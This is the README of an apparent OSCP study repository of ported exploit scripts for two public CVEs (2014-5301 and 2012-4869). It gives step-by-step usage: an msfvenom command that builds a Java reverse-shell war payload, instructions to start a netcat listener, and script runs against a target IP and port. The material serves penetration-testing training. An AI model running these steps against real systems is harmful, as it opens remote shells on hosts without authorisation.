OSCP custom scripts
This is a repository which contains custom/ported POC exploits. They have been made for study and learning purposes.
Currently under development.
CVE: 2014-5301
OSVDB: 116733
URL: http://seclists.org/fulldisclosure/2015/Jan/5
Original metasploit module: https://www.exploit-db.com/exploits/35845
35845.py file.war host port
First create reverse shell payload
msfvenom -p java/shell_reverse_tcp LHOST=<ip address> LPORT=4444 -f war > shell.war
Start netcat listener
Run the script
35845.py shell.war 192.168.1.1 8080
Note: The exploit may require multiple run to get it working. Don’t give up!
CVE: 2012-4869
URL: http://seclists.org/fulldisclosure/2012/Mar/234
Original code: https://www.exploit-db.com/exploits/18650
Edit the file and change rhost, lhost, lport
Start netcat listener on the port you configured
Run the script
python 18650.py